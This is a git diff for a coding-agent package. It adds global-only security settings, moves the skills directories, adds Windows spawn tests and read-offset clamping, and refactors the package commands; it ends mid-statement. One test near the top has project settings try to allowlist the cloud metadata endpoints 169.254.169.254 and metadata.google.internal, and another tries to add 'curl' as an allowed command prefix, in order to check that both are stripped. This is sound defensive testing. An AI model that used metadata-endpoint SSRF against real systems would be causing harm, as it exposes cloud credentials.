assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]); + }); + + it("strips fetchAllowedUrls from project settings at load time", () => { + const { base, agentDir, cwd } = makeTempDirs(); + tmpBase = base; + + // Global: no fetchAllowedUrls + writeFileSync(join(agentDir, "settings.json"), JSON.stringify({})); + + // Project tries to allowlist cloud metadata + writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({ + fetchAllowedUrls: ["metadata.google.internal", "169.254.169.254"], + })); + + const sm = SettingsManager.create(cwd, agentDir); + + // Global has none — project override must not leak through + assert.equal(sm.getFetchAllowedUrls(), undefined); + }); + + it("project settings for non-security fields still merge normally", () => { + const { base, agentDir, cwd } = makeTempDirs(); + tmpBase = base; + + writeFileSync(join(agentDir, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["sops"], + theme: "dark", + })); + + writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["curl"], + theme: "light", + quietStartup: true, + })); + + const sm = SettingsManager.create(cwd, agentDir); + + // Security field: global wins + assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]); + // Normal fields: project overrides global + assert.equal(sm.getQuietStartup(), true); + }); +}); diff --git a/packages/pi-coding-agent/src/core/settings-manager.ts b/packages/pi-coding-agent/src/core/settings-manager.ts index 341f27ca0..de75daa0f 100644 --- a/packages/pi-coding-agent/src/core/settings-manager.ts +++ b/packages/pi-coding-agent/src/core/settings-manager.ts @@ -151,6 +151,24 @@ export interface Settings { fallback?: FallbackSettings; modelDiscovery?: ModelDiscoverySettings; editMode?: "standard" | "hashline"; // Edit tool mode: "standard" (text match) or "hashline" (LINE#ID anchors). Default: "standard" + timestampFormat?: "date-time-iso" | "date-time-us"; // Timestamp display format for messages. Default: "date-time-iso" + allowedCommandPrefixes?: string[]; // Override built-in SAFE_COMMAND_PREFIXES for !command resolution (global-only — ignored in project settings) + fetchAllowedUrls?: string[]; // Hostnames exempted from SSRF blocklist in fetch_page (global-only — ignored in project settings) +} + +/** Settings keys that are only respected from global config — project settings cannot override these. */ +const GLOBAL_ONLY_KEYS: ReadonlySet = new Set([ + "allowedCommandPrefixes", + "fetchAllowedUrls", +]); + +/** Remove global-only keys from a settings object. Applied once at load time. */ +function stripGlobalOnlyKeys(settings: Settings): Settings { + const result = { ...settings }; + for (const key of GLOBAL_ONLY_KEYS) { + delete (result as Record)[key]; + } + return result; } /** Deep merge settings: project/overrides take precedence, nested objects merge recursively */ @@ -303,7 +321,7 @@ export class SettingsManager { ) { this.storage = storage; this.globalSettings = initialGlobal; - this.projectSettings = initialProject; + this.projectSettings = stripGlobalOnlyKeys(initialProject); this.globalSettingsLoadError = globalLoadError; this.projectSettingsLoadError = projectLoadError; this.errors = [...initialErrors]; @@ -440,7 +458,7 @@ export class SettingsManager { const projectLoad = SettingsManager.tryLoadFromStorage(this.storage, "project"); if (!projectLoad.error) { - this.projectSettings = projectLoad.settings; + this.projectSettings = stripGlobalOnlyKeys(projectLoad.settings); this.projectSettingsLoadError = null; } else { this.projectSettingsLoadError = projectLoad.error; @@ -570,7 +588,7 @@ export class SettingsManager { } private saveProjectSettings(settings: Settings): void { - this.projectSettings = structuredClone(settings); + this.projectSettings = stripGlobalOnlyKeys(structuredClone(settings)); this.settings = deepMergeSettings(this.globalSettings, this.projectSettings); if (this.projectSettingsLoadError) { @@ -1087,4 +1105,36 @@ export class SettingsManager { setEditMode(mode: "standard" | "hashline"): void { this.setGlobalSetting("editMode", mode); } + + getTimestampFormat(): "date-time-iso" | "date-time-us" { + return this.settings.timestampFormat ?? "date-time-iso"; + } + + setTimestampFormat(format: "date-time-iso" | "date-time-us"): void { + this.setGlobalSetting("timestampFormat", format); + } + + /** + * Get the allowed command prefixes from global settings only. + * Returns undefined if not configured (caller should use built-in defaults). + */ + getAllowedCommandPrefixes(): string[] | undefined { + return this.globalSettings.allowedCommandPrefixes; + } + + setAllowedCommandPrefixes(prefixes: string[]): void { + this.setGlobalSetting("allowedCommandPrefixes", prefixes); + } + + /** + * Get the fetch URL allowlist from global settings only. + * Returns undefined if not configured (caller should use empty allowlist). + */ + getFetchAllowedUrls(): string[] | undefined { + return this.globalSettings.fetchAllowedUrls; + } + + setFetchAllowedUrls(urls: string[]): void { + this.setGlobalSetting("fetchAllowedUrls", urls); + } } diff --git a/packages/pi-coding-agent/src/core/skills.ts b/packages/pi-coding-agent/src/core/skills.ts index 9868b1546..a8ab488ef 100644 --- a/packages/pi-coding-agent/src/core/skills.ts +++ b/packages/pi-coding-agent/src/core/skills.ts @@ -2,10 +2,28 @@ import { existsSync, readdirSync, readFileSync, realpathSync, statSync } from "f import ignore from "ignore"; import { homedir } from "os"; import { basename, dirname, isAbsolute, join, relative, resolve, sep } from "path"; -import { CONFIG_DIR_NAME, getAgentDir } from "../config.js"; import { parseFrontmatter } from "../utils/frontmatter.js"; import { toPosixPath } from "../utils/path-display.js"; import type { ResourceDiagnostic } from "./diagnostics.js"; +import { CONFIG_DIR_NAME } from "../config.js"; + +/** + * The standard ecosystem skills directory used by skills.sh and the + * Agent Skills standard. All agents share this location for globally + * installed skills. + */ +export const ECOSYSTEM_SKILLS_DIR = join(homedir(), ".agents", "skills"); + +/** + * The standard project-level skills directory (`.agents/skills/` relative to cwd). + */ +export const ECOSYSTEM_PROJECT_SKILLS_DIR = ".agents"; + +/** + * Legacy skills directory (~/.gsd/agent/skills/ or ~/.pi/agent/skills/). + * Read as a fallback so existing installs don't lose skills before migration runs. + */ +const LEGACY_SKILLS_DIR = join(homedir(), CONFIG_DIR_NAME, "agent", "skills"); /** Max name length per spec */ const MAX_NAME_LENGTH = 64; @@ -331,7 +349,7 @@ function escapeXml(str: string): string { export interface LoadSkillsOptions { /** Working directory for project-local skills. Default: process.cwd() */ cwd?: string; - /** Agent config directory for global skills. Default: ~/.pi/agent */ + /** @deprecated Skills now use ~/.agents/skills/ exclusively. This option is ignored. */ agentDir?: string; /** Explicit skill paths (files or directories) */ skillPaths?: string[]; @@ -357,10 +375,7 @@ function resolveSkillPath(p: string, cwd: string): string { * Returns skills and any validation diagnostics. */ export function loadSkills(options: LoadSkillsOptions = {}): LoadSkillsResult { - const { cwd = process.cwd(), agentDir, skillPaths = [], includeDefaults = true } = options; - - // Resolve agentDir - if not provided, use default from config - const resolvedAgentDir = agentDir ?? getAgentDir(); + const { cwd = process.cwd(), skillPaths = [], includeDefaults = true } = options; const skillMap = new Map(); const realPathSet = new Set(); @@ -404,12 +419,22 @@ export function loadSkills(options: LoadSkillsOptions = {}): LoadSkillsResult { } if (includeDefaults) { - addSkills(loadSkillsFromDirInternal(join(resolvedAgentDir, "skills"), "user", true)); - addSkills(loadSkillsFromDirInternal(resolve(cwd, CONFIG_DIR_NAME, "skills"), "project", true)); + // Primary: ~/.agents/skills/ — the industry-standard skills.sh location + addSkills(loadSkillsFromDirInternal(ECOSYSTEM_SKILLS_DIR, "user", true)); + // Primary project: .agents/skills/ — standard project-level location + addSkills(loadSkillsFromDirInternal(resolve(cwd, ECOSYSTEM_PROJECT_SKILLS_DIR, "skills"), "project", true)); + + // Legacy fallback: read skills from ~/.gsd/agent/skills/ so existing + // installs keep working until the one-time migration in resource-loader + // copies them to ~/.agents/skills/. Skip if migration has completed. + const legacyMigrated = existsSync(join(LEGACY_SKILLS_DIR, ".migrated-to-agents")); + if (LEGACY_SKILLS_DIR !== ECOSYSTEM_SKILLS_DIR && existsSync(LEGACY_SKILLS_DIR) && !legacyMigrated) { + addSkills(loadSkillsFromDirInternal(LEGACY_SKILLS_DIR, "user", true)); + } } - const userSkillsDir = join(resolvedAgentDir, "skills"); - const projectSkillsDir = resolve(cwd, CONFIG_DIR_NAME, "skills"); + const userSkillsDir = ECOSYSTEM_SKILLS_DIR; + const projectSkillsDir = resolve(cwd, ECOSYSTEM_PROJECT_SKILLS_DIR, "skills"); const isUnderPath = (target: string, root: string): boolean => { const normalizedRoot = resolve(root); diff --git a/packages/pi-coding-agent/src/core/slash-commands.ts b/packages/pi-coding-agent/src/core/slash-commands.ts index beacd41b9..05cbb1f5e 100644 --- a/packages/pi-coding-agent/src/core/slash-commands.ts +++ b/packages/pi-coding-agent/src/core/slash-commands.ts @@ -37,5 +37,6 @@ export const BUILTIN_SLASH_COMMANDS: ReadonlyArray = [ { name: "reload", description: "Reload extensions, skills, prompts, and themes" }, { name: "thinking", description: "Set thinking level (off/minimal/low/medium/high/xhigh)" }, { name: "edit-mode", description: "Toggle edit mode (standard/hashline)" }, + { name: "terminal", description: "Run a shell command directly (e.g. /terminal ping -c3 1.1.1.1)" }, { name: "quit", description: "Quit pi" }, ]; diff --git a/packages/pi-coding-agent/src/core/system-prompt.ts b/packages/pi-coding-agent/src/core/system-prompt.ts index 310aa9593..f837ae349 100644 --- a/packages/pi-coding-agent/src/core/system-prompt.ts +++ b/packages/pi-coding-agent/src/core/system-prompt.ts @@ -84,9 +84,9 @@ export function buildSystemPrompt(options: BuildSystemPromptOptions = {}): strin } } - // Append skills section (only if read tool is available) - const customPromptHasRead = !selectedTools || selectedTools.includes("read"); - if (customPromptHasRead && skills.length > 0) { + // Append skills section (if read or Skill tool is available) + const customPromptHasSkillAccess = !selectedTools || selectedTools.includes("read") || selectedTools.includes("Skill"); + if (customPromptHasSkillAccess && skills.length > 0) { prompt += formatSkillsForPrompt(skills); } @@ -232,8 +232,9 @@ Pi documentation (read only when the user asks about pi itself, its SDK, extensi } } - // Append skills section (only if read tool is available) - if (hasRead && skills.length > 0) { + // Append skills section (if read or Skill tool is available) + const hasSkill = tools.includes("Skill"); + if ((hasRead || hasSkill) && skills.length > 0) { prompt += formatSkillsForPrompt(skills); } diff --git a/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts b/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts new file mode 100644 index 000000000..9247addf2 --- /dev/null +++ b/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts @@ -0,0 +1,101 @@ +/** + * bash-spawn-windows.test.ts — Regression test for Windows spawn EINVAL. + * + * Verifies that bash tool spawn options disable `detached: true` on Windows + * to prevent EINVAL errors in ConPTY / VSCode terminal contexts. + * + * Background: + * On Windows, `spawn()` with `detached: true` sets the + * CREATE_NEW_PROCESS_GROUP flag in CreateProcess. In certain terminal + * contexts (VSCode integrated terminal, ConPTY, Windows Terminal) this + * flag conflicts with the parent process group and causes a synchronous + * EINVAL from libuv. The bg-shell extension already guards against this + * with `detached: process.platform !== "win32"` (process-manager.ts); + * this test ensures all other spawn sites are aligned. + * + * See: gsd-build/gsd-2#XXXX + */ + +import test from "node:test"; +import assert from "node:assert/strict"; +import { spawn } from "node:child_process"; + +// Verify the spawn option pattern used across the codebase. +// This is a static/structural test — it reads the source files and asserts +// they use the platform-guarded detached flag. +import { readFileSync } from "node:fs"; +import { join, dirname } from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); + +const SPAWN_FILES = [ + join(__dirname, "bash.ts"), + join(__dirname, "..", "bash-executor.ts"), + join(__dirname, "..", "..", "utils", "shell.ts"), +]; + +test("spawn calls use platform-guarded detached flag (no unconditional detached: true)", () => { + for (const file of SPAWN_FILES) { + const content = readFileSync(file, "utf-8"); + const lines = content.split("\n"); + + for (let i = 0; i < lines.length; i++) { + const line = lines[i]!; + // Skip comments + if (line.trim().startsWith("//") || line.trim().startsWith("*")) continue; + // Check for unconditional `detached: true` + if (/detached:\s*true\b/.test(line)) { + assert.fail( + `${file}:${i + 1} has unconditional 'detached: true' — ` + + `must use 'detached: process.platform !== "win32"' ` + + `to prevent EINVAL on Windows (ConPTY / VSCode terminal)`, + ); + } + } + } +}); + +test("killProcessTree does not use detached: true for taskkill on Windows", () => { + const shellFile = join(__dirname, "..", "..", "utils", "shell.ts"); + const content = readFileSync(shellFile, "utf-8"); + + // Find the taskkill spawn call and ensure it doesn't have detached: true + const taskkillRegion = content.match(/spawn\("taskkill"[\s\S]*?\}\)/); + if (taskkillRegion) { + assert.ok( + !/detached:\s*true/.test(taskkillRegion[0]), + "taskkill spawn should not use detached: true — " + + "it can cause EINVAL on Windows and is unnecessary for a utility process", + ); + } +}); + +// Smoke test: spawn with platform-guarded detached flag actually works +test("spawn with detached: process.platform !== 'win32' succeeds", async () => { + const { promise, resolve, reject } = Promise.withResolvers(); + + const child = spawn( + process.platform === "win32" ? "cmd" : "sh", + process.platform === "win32" ? ["/c", "echo ok"] : ["-c", "echo ok"], + { + detached: process.platform !== "win32", + stdio: ["ignore", "pipe", "pipe"], + }, + ); + + let output = ""; + child.stdout?.on("data", (d: Buffer) => { output += d.toString(); }); + child.on("error", reject); + child.on("close", (code) => { + try { + assert.equal(code, 0, "spawn should succeed"); + assert.ok(output.trim().includes("ok"), `Expected 'ok' in output, got: ${output}`); + resolve(); + } catch (e) { + reject(e); + } + }); + + await promise; +}); diff --git a/packages/pi-coding-agent/src/core/tools/bash.ts b/packages/pi-coding-agent/src/core/tools/bash.ts index 4e1d65257..eccda574b 100644 --- a/packages/pi-coding-agent/src/core/tools/bash.ts +++ b/packages/pi-coding-agent/src/core/tools/bash.ts @@ -158,9 +158,13 @@ const defaultBashOperations: BashOperations = { return; } + // On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can + // cause EINVAL in VSCode/ConPTY terminal contexts. The bg-shell + // extension already guards this (process-manager.ts); align here. + // Process-tree cleanup uses taskkill /F /T on Windows regardless. const child = spawn(shell, [...args, command], { cwd, - detached: true, + detached: process.platform !== "win32", env: env ?? getShellEnv(), stdio: ["ignore", "pipe", "pipe"], }); diff --git a/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts b/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts index 532289f11..b7272559e 100644 --- a/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts +++ b/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts @@ -60,26 +60,26 @@ describe("edit-diff", () => { assert.match(result.diff, /CHANGED/); }); - it("computes diffs for preview without native helpers", async () => { + it("computes diffs for preview without native helpers", async (t) => { const dir = mkdtempSync(join(tmpdir(), "edit-diff-test-")); - try { - const file = join(dir, "sample.ts"); - writeFileSync(file, "const title = “Hello”;\n", "utf-8"); - - const result = await computeEditDiff( - file, - "const title = \"Hello\";\n", - "const title = \"Hi\";\n", - dir, - ); - - assert.ok(!("error" in result), "expected a diff result"); - if (!("error" in result)) { - assert.equal(result.firstChangedLine, 1); - assert.match(result.diff, /\+1 const title = "Hi";/); - } - } finally { + t.after(() => { rmSync(dir, { recursive: true, force: true }); + }); + + const file = join(dir, "sample.ts"); + writeFileSync(file, "const title = “Hello”;\n", "utf-8"); + + const result = await computeEditDiff( + file, + "const title = \"Hello\";\n", + "const title = \"Hi\";\n", + dir, + ); + + assert.ok(!("error" in result), "expected a diff result"); + if (!("error" in result)) { + assert.equal(result.firstChangedLine, 1); + assert.match(result.diff, /\+1 const title = "Hi";/); } }); }); diff --git a/packages/pi-coding-agent/src/core/tools/hashline-read.ts b/packages/pi-coding-agent/src/core/tools/hashline-read.ts index fc2da81eb..f7d944d14 100644 --- a/packages/pi-coding-agent/src/core/tools/hashline-read.ts +++ b/packages/pi-coding-agent/src/core/tools/hashline-read.ts @@ -123,12 +123,15 @@ export function createHashlineReadTool(cwd: string, options?: HashlineReadToolOp const allLines = textContent.split("\n"); const totalFileLines = allLines.length; - const startLine = offset ? Math.max(0, offset - 1) : 0; - const startLineDisplay = startLine + 1; + let startLine = offset ? Math.max(0, offset - 1) : 0; + // Clamp offset to file bounds instead of throwing (#3007) + let offsetClamped = false; if (startLine >= allLines.length) { - throw new Error(`Offset ${offset} is beyond end of file (${allLines.length} lines total)`); + startLine = Math.max(0, allLines.length - 1); + offsetClamped = true; } + const startLineDisplay = startLine + 1; let selectedContent: string; let userLimitedLines: number | undefined; @@ -172,6 +175,11 @@ export function createHashlineReadTool(cwd: string, options?: HashlineReadToolOp outputText = formatHashLines(truncation.content, startLineDisplay); } + // Prepend clamp notice so the agent knows offset was adjusted + if (offsetClamped) { + outputText = `[Offset ${offset} beyond end of file (${totalFileLines} lines). Clamped to line ${startLineDisplay}.]\n\n${outputText}`; + } + content = [{ type: "text", text: outputText }]; } diff --git a/packages/pi-coding-agent/src/core/tools/read.ts b/packages/pi-coding-agent/src/core/tools/read.ts index c2f23e60a..309e43b57 100644 --- a/packages/pi-coding-agent/src/core/tools/read.ts +++ b/packages/pi-coding-agent/src/core/tools/read.ts @@ -133,13 +133,18 @@ export function createReadTool(cwd: string, options?: ReadToolOptions): AgentToo const totalFileLines = allLines.length; // Apply offset if specified (1-indexed to 0-indexed) - const startLine = offset ? Math.max(0, offset - 1) : 0; - const startLineDisplay = startLine + 1; // For display (1-indexed) + let startLine = offset ? Math.max(0, offset - 1) : 0; - // Check if offset is out of bounds + // Clamp offset to file bounds instead of throwing (#3007). + // When an agent requests offset:30 on a 13-line file, return + // the last line with a notice rather than an error that + // propagates as invalid JSON downstream. + let offsetClamped = false; if (startLine >= allLines.length) { - throw new Error(`Offset ${offset} is beyond end of file (${allLines.length} lines total)`); + startLine = Math.max(0, allLines.length - 1); + offsetClamped = true; } + const startLineDisplay = startLine + 1; // For display (1-indexed) // If limit is specified by user, use it; otherwise we'll let truncateHead decide let selectedContent: string; @@ -187,6 +192,11 @@ export function createReadTool(cwd: string, options?: ReadToolOptions): AgentToo outputText = truncation.content; } + // Prepend clamp notice so the agent knows offset was adjusted + if (offsetClamped) { + outputText = `[Offset ${offset} beyond end of file (${totalFileLines} lines). Clamped to line ${startLineDisplay}.]\n\n${outputText}`; + } + content = [{ type: "text", text: outputText }]; } diff --git a/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts b/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts new file mode 100644 index 000000000..a7929a1dd --- /dev/null +++ b/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts @@ -0,0 +1,92 @@ +/** + * spawn-shell-windows.test.ts — Regression test for Windows spawn ENOENT/EINVAL. + * + * On Windows, npm/npx/tsc and other tools are installed as .cmd batch scripts. + * Node's `spawn()` without `shell: true` cannot execute .cmd files, resulting + * in ENOENT or EINVAL errors. Every spawn site that may invoke a user-installed + * binary (not `node` or a shell like `sh`/`bash`/`cmd`) must include + * `shell: process.platform === "win32"` so the call is resolved through cmd.exe + * on Windows while remaining a direct exec on POSIX. + * + * This test structurally scans all spawn sites and verifies the guard is present. + * + * Fixes: gsd-build/gsd-2#2854 + */ + +import test from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join, dirname, relative } from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const coreDir = join(__dirname, ".."); + +/** + * Files that call `spawn()` with a user-facing binary (not `node`, `sh`, `bash`, + * or `cmd`) and therefore need the Windows shell guard. + * + * If a file spawns only hardcoded system binaries (like `node` in rpc-client.ts), + * it does not need the guard and should NOT appear here. + */ +const SPAWN_FILES_NEEDING_SHELL_GUARD = [ + // Extension's GSD client — spawns the `gsd` binary which is a .cmd on Windows + join(coreDir, "..", "..", "..", "vscode-extension", "src", "gsd-client.ts"), + // exec.ts — used by extensions to run arbitrary commands + join(coreDir, "exec.ts"), + // LSP index — spawns project-type commands (tsc, cargo, etc.) + join(coreDir, "lsp", "index.ts"), + // LSP client — spawns LSP server binaries (npx, etc.) + join(coreDir, "lsp", "client.ts"), + // LSP mux — spawns lspmux binary + join(coreDir, "lsp", "lspmux.ts"), + // Package manager — spawns npm/yarn/pnpm + join(coreDir, "package-manager.ts"), +]; + +test("all spawn sites that invoke user-facing binaries include shell: process.platform === 'win32'", () => { + const failures: string[] = []; + + for (const file of SPAWN_FILES_NEEDING_SHELL_GUARD) { + let content: string; + try { + content = readFileSync(file, "utf-8"); + } catch { + // File may not exist in this checkout — skip + continue; + } + + const lines = content.split("\n"); + + // Find all spawn(..., { ... }) call sites and check each one + // for the presence of `shell: process.platform === "win32"` within + // 5 lines after the spawn call. + for (let i = 0; i < lines.length; i++) { + const line = lines[i]!; + // Skip comments + if (line.trim().startsWith("//") || line.trim().startsWith("*")) continue; + + // Detect a spawn() call + if (/\bspawn\(/.test(line)) { + // Look ahead up to 8 lines for the shell guard + const lookahead = lines.slice(i, i + 8).join("\n"); + const hasShellGuard = + /shell:\s*process\.platform\s*===\s*["']win32["']/.test(lookahead); + + if (!hasShellGuard) { + const relPath = relative(join(coreDir, "..", ".."), file); + failures.push(`${relPath}:${i + 1}`); + } + } + } + } + + assert.deepEqual( + failures, + [], + `The following spawn sites are missing 'shell: process.platform === "win32"':\n` + + failures.map(f => ` - ${f}`).join("\n") + + `\nOn Windows, .cmd wrapper scripts (npm, npx, tsc, gsd) require shell ` + + `resolution. Without this guard, spawn fails with ENOENT or EINVAL.`, + ); +}); diff --git a/packages/pi-coding-agent/src/index.ts b/packages/pi-coding-agent/src/index.ts index 882f92e5b..86686caf0 100644 --- a/packages/pi-coding-agent/src/index.ts +++ b/packages/pi-coding-agent/src/index.ts @@ -68,6 +68,7 @@ export type { Extension, ExtensionActions, ExtensionAPI, + ExtensionManifest, ExtensionCommandContext, ExtensionCommandContextActions, ExtensionContext, @@ -94,6 +95,11 @@ export type { MessageRenderOptions, ProviderConfig, ProviderModelConfig, + LifecycleHookContext, + LifecycleHookHandler, + LifecycleHookMap, + LifecycleHookPhase, + LifecycleHookScope, ReadToolCallEvent, RegisteredCommand, RegisteredTool, @@ -114,12 +120,16 @@ export type { ToolCallEvent, ToolDefinition, ToolInfo, + SortResult, + SortWarning, ToolRenderResultOptions, ToolResultEvent, TurnEndEvent, TurnStartEvent, UserBashEvent, UserBashEventResult, + BashTransformEvent, + BashTransformEventResult, WidgetPlacement, WriteToolCallEvent, } from "./core/extensions/index.js"; @@ -130,6 +140,9 @@ export { importExtensionModule, isToolCallEventType, isToolResultEventType, + readManifest, + readManifestFromEntryPath, + sortExtensionPaths, wrapRegisteredTool, wrapRegisteredTools, wrapToolsWithExtensions, @@ -152,6 +165,8 @@ export type { ResolvedResource, } from "./core/package-manager.js"; export { DefaultPackageManager } from "./core/package-manager.js"; +export type { PackageCommand, PackageCommandOptions, PackageCommandRunnerOptions, PackageCommandRunnerResult } from "./core/package-commands.js"; +export { getPackageCommandUsage, parsePackageCommand, runPackageCommand } from "./core/package-commands.js"; export type { ResourceCollision, ResourceDiagnostic, ResourceLoader } from "./core/resource-loader.js"; export { DefaultResourceLoader } from "./core/resource-loader.js"; // SDK for programmatic usage @@ -210,8 +225,15 @@ export { SettingsManager, type TaskIsolationSettings, } from "./core/settings-manager.js"; +export { + SAFE_COMMAND_PREFIXES, + setAllowedCommandPrefixes, + getAllowedCommandPrefixes, +} from "./core/resolve-config-value.js"; // Skills export { + ECOSYSTEM_SKILLS_DIR, + ECOSYSTEM_PROJECT_SKILLS_DIR, formatSkillsForPrompt, getLoadedSkills, type LoadSkillsFromDirOptions, @@ -303,8 +325,11 @@ export { type RpcClientOptions, type RpcEventListener, type RpcCommand, + type RpcInitResult, + type RpcProtocolVersion, type RpcResponse, type RpcSessionState, + type RpcV2Event, } from "./modes/index.js"; // RPC JSONL utilities export { attachJsonlLineReader, serializeJsonLine } from "./modes/rpc/jsonl.js"; diff --git a/packages/pi-coding-agent/src/main.ts b/packages/pi-coding-agent/src/main.ts index 1f1c961e0..4416043cc 100644 --- a/packages/pi-coding-agent/src/main.ts +++ b/packages/pi-coding-agent/src/main.ts @@ -20,6 +20,7 @@ import type { LoadExtensionsResult } from "./core/extensions/index.js"; import { KeybindingsManager } from "./core/keybindings.js"; import { ModelRegistry } from "./core/model-registry.js"; import { resolveCliModel, resolveModelScope, type ScopedModel } from "./core/model-resolver.js"; +import { runPackageCommand } from "./core/package-commands.js"; import { DefaultPackageManager } from "./core/package-manager.js"; import { DefaultResourceLoader } from "./core/resource-loader.js"; import { type CreateAgentSessionOptions, createAgentSession } from "./core/sdk.js"; @@ -69,237 +70,6 @@ function isTruthyEnvFlag(value: string | undefined): boolean { return value === "1" || value.toLowerCase() === "true" || value.toLowerCase() === "yes"; } -type PackageCommand = "install" | "remove" | "update" | "list"; - -interface PackageCommandOptions { - command: PackageCommand; - source?: string; - local: boolean; - help: boolean; - invalidOption?: string; -} - -function getPackageCommandUsage(command: PackageCommand): string { - switch (command) { - case "install": - return `${APP_NAME} install [-l]`; - case "remove": - return `${APP_NAME} remove [-l]`; - case "update": - return `${APP_NAME} update [source]`; - case "list": - return `${APP_NAME} list`; - } -} - -function printPackageCommandHelp(command: PackageCommand): void { - switch (command) { - case "install": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("install")} - -Install a package and add it to settings. - -Options: - -l, --local Install project-locally (.pi/settings.json) - -Examples: - ${APP_NAME} install npm:@foo/bar - ${APP_NAME} install git:github.com/user/repo - ${APP_NAME} install git:git@github.com:user/repo - ${APP_NAME} install https://github.com/user/repo - ${APP_NAME} install ssh://git@github.com/user/repo - ${APP_NAME} install ./local/path -`); - return; - - case "remove": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("remove")} - -Remove a package and its source from settings. - -Options: - -l, --local Remove from project settings (.pi/settings.json) - -Example: - ${APP_NAME} remove npm:@foo/bar -`); - return; - - case "update": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("update")} - -Update installed packages. -If is provided, only that package is updated. -`); - return; - - case "list": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("list")} - -List installed packages from user and project settings. -`); - return; - } -} - -function parsePackageCommand(args: string[]): PackageCommandOptions | undefined { - const [command, ...rest] = args; - if (command !== "install" && command !== "remove" && command !== "update" && command !== "list") { - return undefined; - } - - let local = false; - let help = false; - let invalidOption: string | undefined; - let source: string | undefined; - - for (const arg of rest) { - if (arg === "-h" || arg === "--help") { - help = true; - continue; - } - - if (arg === "-l" || arg === "--local") { - if (command === "install" || command === "remove") { - local = true; - } else { - invalidOption = invalidOption ?? arg; - } - continue; - } - - if (arg.startsWith("-")) { - invalidOption = invalidOption ?? arg; - continue; - } - - if (!source) { - source = arg; - } - } - - return { command, source, local, help, invalidOption }; -} - -async function handlePackageCommand(args: string[]): Promise { - const options = parsePackageCommand(args); - if (!options) { - return false; - } - - if (options.help) { - printPackageCommandHelp(options.command); - return true; - } - - if (options.invalidOption) { - console.error(chalk.red(`Unknown option ${options.invalidOption} for "${options.command}".`)); - console.error(chalk.dim(`Use "${APP_NAME} --help" or "${getPackageCommandUsage(options.command)}".`)); - process.exitCode = 1; - return true; - } - - const source = options.source; - if ((options.command === "install" || options.command === "remove") && !source) { - console.error(chalk.red(`Missing ${options.command} source.`)); - console.error(chalk.dim(`Usage: ${getPackageCommandUsage(options.command)}`)); - process.exitCode = 1; - return true; - } - - const cwd = process.cwd(); - const agentDir = getAgentDir(); - const settingsManager = SettingsManager.create(cwd, agentDir); - reportSettingsErrors(settingsManager, "package command"); - const packageManager = new DefaultPackageManager({ cwd, agentDir, settingsManager }); - - packageManager.setProgressCallback((event) => { - if (event.type === "start") { - process.stdout.write(chalk.dim(`${event.message}\n`)); - } - }); - - try { - switch (options.command) { - case "install": - await packageManager.install(source!, { local: options.local }); - packageManager.addSourceToSettings(source!, { local: options.local }); - console.log(chalk.green(`Installed ${source}`)); - return true; - - case "remove": { - await packageManager.remove(source!, { local: options.local }); - const removed = packageManager.removeSourceFromSettings(source!, { local: options.local }); - if (!removed) { - console.error(chalk.red(`No matching package found for ${source}`)); - process.exitCode = 1; - return true; - } - console.log(chalk.green(`Removed ${source}`)); - return true; - } - - case "list": { - const globalSettings = settingsManager.getGlobalSettings(); - const projectSettings = settingsManager.getProjectSettings(); - const globalPackages = globalSettings.packages ?? []; - const projectPackages = projectSettings.packages ?? []; - - if (globalPackages.length === 0 && projectPackages.length === 0) { - console.log(chalk.dim("No packages installed.")); - return true; - } - - const formatPackage = (pkg: (typeof globalPackages)[number], scope: "user" | "project") => { - const source = typeof pkg === "string" ? pkg : pkg.source; - const filtered = typeof pkg === "object"; - const display = filtered ? `${source} (filtered)` : source; - console.log(` ${display}`); - const path = packageManager.getInstalledPath(source, scope); - if (path) { - console.log(chalk.dim(` ${path}`)); - } - }; - - if (globalPackages.length > 0) { - console.log(chalk.bold("User packages:")); - for (const pkg of globalPackages) { - formatPackage(pkg, "user"); - } - } - - if (projectPackages.length > 0) { - if (globalPackages.length > 0) console.log(); - console.log(chalk.bold("Project packages:")); - for (const pkg of projectPackages) { - formatPackage(pkg, "project"); - } - } - - return true; - } - - case "update": - await packageManager.update(source); - if (source) { - console.log(chalk.green(`Updated ${source}`)); - } else { - console.log(chalk.green("Updated packages")); - } - return true; - } - } catch (error: unknown) { - const message = error instanceof Error ? error.message : "Unknown package command error"; - console.error(chalk.red(`Error: ${message}`)); - process.exitCode = 1; - return true; - } -} - async function prepareInitialMessage( parsed: Args, autoResizeImages: boolean, @@ -590,7 +360,16 @@ export async function main(args: string[]) { process.env.PI_SKIP_VERSION_CHECK = "1"; } - if (await handlePackageCommand(args)) { + const packageCommand = await runPackageCommand({ + appName: APP_NAME, + args, + cwd: process.cwd(), + agentDir: getAgentDir(), + stdout: process.stdout, + stderr: process.stderr, + }); + if (packageCommand.handled) { + process.exitCode = packageCommand.exitCode; return; } @@ -612,6 +391,25 @@ export async function main(args: string[]) { const authStorage = AuthStorage.create(); const modelRegistry = new ModelRegistry(authStorage, getModelsPath()); + // Offline mode validation / auto-detection + if (offlineMode) { + // --offline flag: validate all models are local + if (!modelRegistry.isAllLocalChain()) { + const remoteModel = modelRegistry.getAll().find((m) => !ModelRegistry.isLocalModel(m)); + if (remoteModel) { + console.error( + 